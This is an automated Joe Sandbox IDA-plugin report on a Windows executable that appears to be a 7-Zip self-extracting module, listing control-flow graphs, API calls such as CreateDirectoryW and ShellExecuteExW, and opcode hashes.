                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                                                                                • String ID: Static
                                                                                                                                                                • API String ID: 2479445380-2272013587
                                                                                                                                                                • Opcode ID: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                                                                                                                • Instruction ID: 2d78b022e2fbb31551ae1a24c66cabd830678dfcab2333de03de12e069c17b52
                                                                                                                                                                • Opcode Fuzzy Hash: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                                                                                                                • Instruction Fuzzy Hash: 2BF062325472217BCA312BA69C4DEEF3E2DEF46BB1F004260F619A11D1DAB94111C6BA

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 901 414491-4144ac call 416606 904 4144bb-4144f9 call 407613 call 4136b9 901->904 905 4144ae-4144b8 901->905 910 4145c7-4145ed call 41424b call 414186 904->910 911 4144ff-414509 ??2@YAPAXI@Z 904->911 921 41460b-414623 call 4127e6 call 413cbd 910->921 922 4145ef-414605 call 413d98 910->922 912 414518 911->912 913 41450b-414516 911->913 916 41451a-414553 call 41334e ??2@YAPAXI@Z 912->916 913->916 923 414565 916->923 924 414555-414563 916->924 938 414625-414632 ??2@YAPAXI@Z 921->938 939 41465b-41466b 921->939 922->921 932 414787-41479e 922->932 925 414567-4145a0 call 41334e call 410320 call 414020 923->925 924->925 953 4145a2-4145a4 925->953 954 4145a8-4145ad 925->954 941 414a14-414a2f call 413d2a 932->941 942 4147a4 932->942 943 414634-41463b call 414270 938->943 944 41463d 938->944 955 41469b-4146a1 939->955 956 41466d 939->956 961 414a31-414a37 941->961 962 414a3a-414a3d 941->962 949 4147a7-4147da 942->949 945 41463f-41464f call 4136b9 943->945 944->945 967 414651-414654 945->967 968 414656 945->968 973 414810-414828 949->973 974 4147dc-4147e5 949->974 953->954 964 4145b5-4145c1 954->964 965 4145af-4145b1 954->965 959 414775-414784 call 414419 955->959 960 4146a7-4146c7 call 412958 955->960 963 41466f-414695 call 412885 call 413d75 call 413edc call 413f0e 956->963 959->932 977 4146cc-4146d4 960->977 961->962 962->963 971 414a43-414a6a call 41271d 962->971 963->955 964->910 964->911 965->964 975 414658 967->975 968->975 994 414a82-414a9e 971->994 995 414a6c-414a80 call 416407 971->995 990 4148e2-414925 call 41271d * 2 973->990 991 41482e-414833 973->991 980 4147eb-414800 974->980 981 41497f-414981 974->981 975->939 983 414949-41494e 977->983 984 4146da-4146e1 977->984 998 414ab1-414ab3 980->998 999 414806-414808 980->999 997 414985-41498a 981->997 988 414950-414952 983->988 989 414956-41495b 983->989 992 4146e3-4146e7 984->992 993 41470f-414712 984->993 988->989 1002 414963-414966 989->1002 1003 41495d-41495f 989->1003 1036 414927-41492a 990->1036 1037 41498f 990->1037 1004 414ac3-414ac5 991->1004 1005 414839-41484a 991->1005 992->993 1007 4146e9-4146ec 992->1007 1000 414978-41497d 993->1000 1001 414718-414726 call 4136b9 993->1001 1091 414a9f call 418583 994->1091 1092 414a9f call 413bea 994->1092 1093 414a9f call 402a2f 994->1093 995->994 997->963 1012 414ab5-414ab7 998->1012 1013 414abb-414abe 998->1013 999->973 1017 41480a-41480c 999->1017 1000->981 1000->997 1032 414733-414744 call 414020 1001->1032 1033 414728-41472e call 418e03 1001->1033 1002->963 1003->1002 1022 414ac9-414ace 1004->1022 1034 414850-414882 call 402a67 call 40b2b0 1005->1034 1035 414ad3-414ae1 SysFreeString 1005->1035 1015 4146f2-414700 call 4136b9 1007->1015 1016 41496b-414970 1007->1016 1011 414aa2-414aac call 412885 1011->963 1012->1013 1013->963 1015->1032 1040 414702-41470d call 418dde 1015->1040 1016->997 1026 414972-414974 1016->1026 1017->973 1022->963 1026->1000 1053 414746-414748 1032->1053 1054 41474c-414751 1032->1054 1033->1032 1063 414884-41488a 1034->1063 1064 41489a-4148b8 ??3@YAXPAX@Z 1034->1064 1038 414ae3-414ae5 1035->1038 1039 414ae9-414aeb 1035->1039 1045 41492d-414945 call 416407 1036->1045 1044 414992-414997 1037->1044 1038->1039 1039->963 1040->1032 1049 414999-4149a5 call 413fb1 1044->1049 1050 4149df-414a0b call 412885 * 2 1044->1050 1067 414947 1045->1067 1069 4149b3-4149bf call 413ffc 1049->1069 1070 4149a7-4149b1 1049->1070 1050->949 1087 414a11 1050->1087 1053->1054 1058 414753-414755 1054->1058 1059 414759-41475e 1054->1059 1058->1059 1061 414760-414762 1059->1061 1062 414766-41476f 1059->1062 1061->1062 1062->959 1062->960 1068 41488c-414898 1063->1068 1076 414af0-414af7 ??3@YAXPAX@Z 1064->1076 1077 4148be-4148da ??3@YAXPAX@Z SysFreeString 1064->1077 1067->1044 1068->1064 1068->1068 1082 4149c5 1069->1082 1083 414af9-414b09 call 412885 * 2 1069->1083 1073 4149c8-4149dd call 416407 1070->1073 1073->1049 1073->1050 1076->1035 1077->990 1081 4148dc-4148de 1077->1081 1081->990 1082->1073 1083->1022 1087->941 1091->1011 1092->1011 1093->1011
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 00414501
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0041454B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                                                                                                                                                • Instruction ID: b54dbc60db56bc1e6d6afd4c66008574e1cbac59b919e387d83e05da41c529ad
                                                                                                                                                                • Opcode Fuzzy Hash: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                                                                                                                                                • Instruction Fuzzy Hash: 89321271900249DFCB14DFA5C8848EEBBB5BF88308B14456EF9169B351CB39E985CF98

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1094 4039e7-403a0d lstrlenW call 402a67 1097 403a18-403a24 1094->1097 1098 403a0f-403a13 call 4011b7 1094->1098 1100 403a26-403a2a 1097->1100 1101 403a2c-403a32 1097->1101 1098->1097 1100->1101 1102 403a35-403a37 1100->1102 1101->1102 1103 403a5b-403a64 call 401e6b 1102->1103 1106 403a66-403a79 GetSystemTimeAsFileTime GetFileAttributesW 1103->1106 1107 403a4a-403a4c 1103->1107 1108 403a92-403a9b call 401e6b 1106->1108 1109 403a7b-403a89 call 40367d 1106->1109 1110 403a39-403a41 1107->1110 1111 403a4e-403a50 1107->1111 1124 403aac-403aae 1108->1124 1125 403a9d-403aaa call 409606 1108->1125 1109->1108 1123 403a8b-403a8d 1109->1123 1110->1111 1116 403a43-403a47 1110->1116 1112 403a56 1111->1112 1113 403b0a-403b10 1111->1113 1112->1103 1119 403b12-403b1d 1113->1119 1120 403b3a-403b4d call 409606 ??3@YAXPAX@Z 1113->1120 1116->1111 1121 403a49 1116->1121 1119->1120 1126 403b1f-403b23 1119->1126 1135 403b4f-403b53 1120->1135 1121->1107 1130 403b2f-403b38 ??3@YAXPAX@Z 1123->1130 1127 403ab0-403acf memcpy 1124->1127 1128 403afe-403b08 ??3@YAXPAX@Z 1124->1128 1125->1123 1126->1120 1132 403b25-403b2a 1126->1132 1133 403ad1 1127->1133 1134 403ae4-403ae8 1127->1134 1128->1135 1130->1135 1132->1120 1137 403b2c-403b2e 1132->1137 1138 403ae3 1133->1138 1139 403ad3-403adb 1134->1139 1140 403aea-403af7 call 401e6b 1134->1140 1137->1130 1138->1134 1139->1140 1141 403add-403ae1 1139->1141 1140->1125 1144 403af9-403afc 1140->1144 1141->1138 1141->1140 1144->1127 1144->1128
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                                                                                                                  • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                  • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                • memcpy.MSVCRT(-00000001,00401A74,?,?,?,?,?,00401A74,?), ref: 00403AC2
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00401A74,?), ref: 00403AFF
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00401A74,00401A74,?,?,?,?,00401A74,?), ref: 00403B45
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 846840743-0
                                                                                                                                                                • Opcode ID: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                                                                                                                • Instruction ID: 952cd346550c55d7e35c26256f51fad4d5ed31c9206aabe41908170679320093
                                                                                                                                                                • Opcode Fuzzy Hash: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                                                                                                                • Instruction Fuzzy Hash: 4141E836A00112AADB20AF59C841ABF7B7CEB4170AF50413BEC81B21D1D77D5A4286DD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1145 4053b2-4053f7 call 4014eb * 2 memset 1150 405403-405407 1145->1150 1151 4053f9-4053fc 1145->1151 1152 405410-40542a call 404e9f call 401403 1150->1152 1153 405409 1150->1153 1151->1150 1158 405445-40545d ShellExecuteExW 1152->1158 1159 40542c-405434 ??3@YAXPAX@Z 1152->1159 1153->1152 1161 405485-405487 1158->1161 1162 40545f-405466 1158->1162 1160 405437-405444 ??3@YAXPAX@Z 1159->1160 1163 40547c-405483 ??3@YAXPAX@Z 1161->1163 1164 405473-405476 CloseHandle 1162->1164 1165 405468-40546d WaitForSingleObject 1162->1165 1163->1160 1164->1163 1165->1164
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004053D6
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?), ref: 0040542F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00405437
                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00405455
                                                                                                                                                                • WaitForSingleObject.KERNEL32(004071CC,000000FF), ref: 0040546D
                                                                                                                                                                • CloseHandle.KERNEL32(004071CC), ref: 00405476
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040547D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2700081640-0
                                                                                                                                                                • Opcode ID: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                                                                                                                • Instruction ID: a17db50f12ff5cb4ace43bc03755f74cf1bf378a7c310b81d7eb3e61b1d8450d
                                                                                                                                                                • Opcode Fuzzy Hash: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
                                                                                                                                                                • Instruction Fuzzy Hash: 3D212B71804208ABDB119FD5D885AEFBBB8EF44319F10812BE915B61A1D7785985CF84

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1166 401e6b-401e7a CreateDirectoryW 1167 401eac-401eb0 1166->1167 1168 401e7c-401e89 GetLastError 1166->1168 1169 401e96-401ea3 GetFileAttributesW 1168->1169 1170 401e8b 1168->1170 1169->1167 1172 401ea5-401ea7 1169->1172 1171 401e8c-401e95 SetLastError 1170->1171 1172->1167 1173 401ea9-401eaa 1172->1173 1173->1171
                                                                                                                                                                APIs
                                                                                                                                                                • CreateDirectoryW.KERNELBASE(a:@,00000000,-00000001,00403A61,?,00401A74,?,?,?,?,00401A74,?), ref: 00401E72
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00401A74,?), ref: 00401E7C
                                                                                                                                                                • SetLastError.KERNEL32(000000B7,?,?,?,?,00401A74,?), ref: 00401E8C
                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00401E9A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                                                • String ID: a:@
                                                                                                                                                                • API String ID: 635176117-3844204524
                                                                                                                                                                • Opcode ID: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                                                                                                                • Instruction ID: 62bb911204df67689409a0bf299a5fa733f048eefc6419992ca9e78119752425
                                                                                                                                                                • Opcode Fuzzy Hash: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
                                                                                                                                                                • Instruction Fuzzy Hash: 0CE09A3494A210BFEB212B24FC087DF3B549F01321F608A36FC19E21F0C3388852868A

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1177 416891-4168ae call 413b40 1180 4168b4-4168bb call 4163a6 1177->1180 1181 4169e6-4169e9 1177->1181 1184 4168c4-4168f3 call 40b2b0 memcpy 1180->1184 1185 4168bd-4168bf 1180->1185 1188 4168f6-4168fe 1184->1188 1185->1181 1189 416900-41690e 1188->1189 1190 416916-41692e 1188->1190 1191 416910 1189->1191 1192 41698a-416993 ??3@YAXPAX@Z 1189->1192 1196 416930-416935 1190->1196 1197 416995 1190->1197 1191->1190 1193 416912-416914 1191->1193 1194 4169e4-4169e5 1192->1194 1193->1190 1193->1192 1194->1181 1199 416937-41693f 1196->1199 1200 41699a-41699d 1196->1200 1198 416997-416998 1197->1198 1201 4169dd-4169e2 ??3@YAXPAX@Z 1198->1201 1202 416941 1199->1202 1203 416973-416985 memmove 1199->1203 1200->1198 1201->1194 1204 416950-416954 1202->1204 1203->1188 1205 416956-416958 1204->1205 1206 416948-41694a 1204->1206 1205->1203 1207 41695a-416963 call 4163a6 1205->1207 1206->1203 1208 41694c-41694d 1206->1208 1211 416965-416971 1207->1211 1212 41699f-4169d5 memcpy call 412a6a 1207->1212 1208->1204 1211->1203 1213 416943-416946 1211->1213 1214 4169d8-4169db 1212->1214 1213->1204 1214->1201
                                                                                                                                                                APIs
                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 004168E8
                                                                                                                                                                • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 0041697F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0041698B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@memcpymemmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3549172513-0
                                                                                                                                                                • Opcode ID: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                                                                                                                • Instruction ID: 6694c7cce515cef0b0cd55d5e6bb9cb7435d9f647c4cb47c4d4af15ebe31c866
                                                                                                                                                                • Opcode Fuzzy Hash: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
                                                                                                                                                                • Instruction Fuzzy Hash: 2D41CEB1A10204ABDB20DE65C941BFFB7B9EF44704F16446EE845A7241D738EE81CBA9

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1229 404d0b-404d8c #17 call 418f40 call 402427 call 40247d * 7 1248 404d91-404da5 SHGetSpecialFolderPathW 1229->1248 1249 404e3a-404e3e 1248->1249 1250 404dab-404df5 wsprintfW call 4014eb * 2 call 401403 * 2 call 4035cf 1248->1250 1249->1248 1252 404e44-404e48 1249->1252 1261 404dfa-404e00 1250->1261 1262 404e02-404e25 call 401403 * 2 call 4035cf 1261->1262 1263 404e2a-404e30 1261->1263 1262->1263 1263->1261 1265 404e32-404e35 call 402990 1263->1265 1265->1249
                                                                                                                                                                APIs
                                                                                                                                                                • #17.COMCTL32(00000000,?,?), ref: 00404D17
                                                                                                                                                                  • Part of subcall function 00402427: GetUserDefaultUILanguage.KERNEL32(00404D27,?,?), ref: 00402431
                                                                                                                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                                                  • Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
                                                                                                                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                                                  • Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                                                  • Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                                                  • Part of subcall function 0040247D: lstrcmpiW.KERNEL32(00ABA1E8,?), ref: 00402541
                                                                                                                                                                  • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(00ABA1E8), ref: 00402551
                                                                                                                                                                  • Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                                                  • Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                                                  • Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                                                  • Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                                                  • Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                                                                                                                  • Part of subcall function 0040247D: _wtol.MSVCRT ref: 0040260A
                                                                                                                                                                  • Part of subcall function 0040247D: MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00ABA1E8,00000002), ref: 0040262A
                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
                                                                                                                                                                • wsprintfW.USER32 ref: 00404DB8
                                                                                                                                                                  • Part of subcall function 004035CF: ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                                                                • String ID: 7zSfxFolder%02d
                                                                                                                                                                • API String ID: 3387708999-2820892521
                                                                                                                                                                • Opcode ID: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                                                                                                                • Instruction ID: 1fdf757244b44e0294be47ca2d8d1062c2b35c8cdb495cdfc6011dfc87a7cf41
                                                                                                                                                                • Opcode Fuzzy Hash: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
                                                                                                                                                                • Instruction Fuzzy Hash: 8F317CB1A112089ECB11FFB2DD8AEEE7BA8AF44305F00403FA559A61E1EB784545CB59

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1271 40b2b0-40b2bb 1272 40b300-40b302 1271->1272 1273 40b2bd-40b2c0 1271->1273 1274 40b2c2-40b2d2 ??2@YAPAXI@Z 1273->1274 1275 40b2eb 1273->1275 1276 40b2d4-40b2d6 1274->1276 1277 40b2ed-40b2ff ??3@YAXPAX@Z 1274->1277 1275->1277 1278 40b2d8 1276->1278 1279 40b2da-40b2e9 memmove 1276->1279 1277->1272 1278->1279 1279->1277
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2C3
                                                                                                                                                                • memmove.MSVCRT(00000000,?,?), ref: 0040B2E0
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2F1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@memmove
                                                                                                                                                                • String ID: hA
                                                                                                                                                                • API String ID: 3828600508-1221461045
                                                                                                                                                                • Opcode ID: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                                                                                                                                                • Instruction ID: d87302abea443053d5760b5c6252bf4bae7be4f47644660215ecec497c7fda62
                                                                                                                                                                • Opcode Fuzzy Hash: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
                                                                                                                                                                • Instruction Fuzzy Hash: BEF0B4B66006005BC2209B1B9C9485BB7E9EFC9700704887FE92ED3700D334FC54C6AE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1280 402ee4-402f2e call 4192c0 call 412a6a lstrlenA * 2 1284 402f33-402f4f call 412a36 1280->1284 1286 402f55-402f5a 1284->1286 1287 40301f 1284->1287 1286->1287 1288 402f60-402f6a 1286->1288 1289 403021-403025 1287->1289 1290 402f6d-402f72 1288->1290 1291 402fb1-402fb6 1290->1291 1292 402f74-402f79 1290->1292 1293 402fb8-402fcb memcmp 1291->1293 1294 402fdb-402fff memmove 1291->1294 1292->1294 1295 402f7b-402f8e memcmp 1292->1295 1296 402fab-402faf 1293->1296 1297 402fcd-402fd9 1293->1297 1298 403001-403008 1294->1298 1299 40300e-403019 1294->1299 1300 402f94-402f9e 1295->1300 1301 40301b-40301d 1295->1301 1296->1290 1297->1290 1298->1299 1302 402f30 1298->1302 1299->1289 1300->1287 1303 402fa0-402fa6 call 402c21 1300->1303 1301->1289 1302->1284 1303->1296
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F16
                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F1E
                                                                                                                                                                • memcmp.MSVCRT(00000000,?,?), ref: 00402F84
                                                                                                                                                                • memcmp.MSVCRT(00000000,?,?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FC1
                                                                                                                                                                • memmove.MSVCRT(?,?,00000000,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FF3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
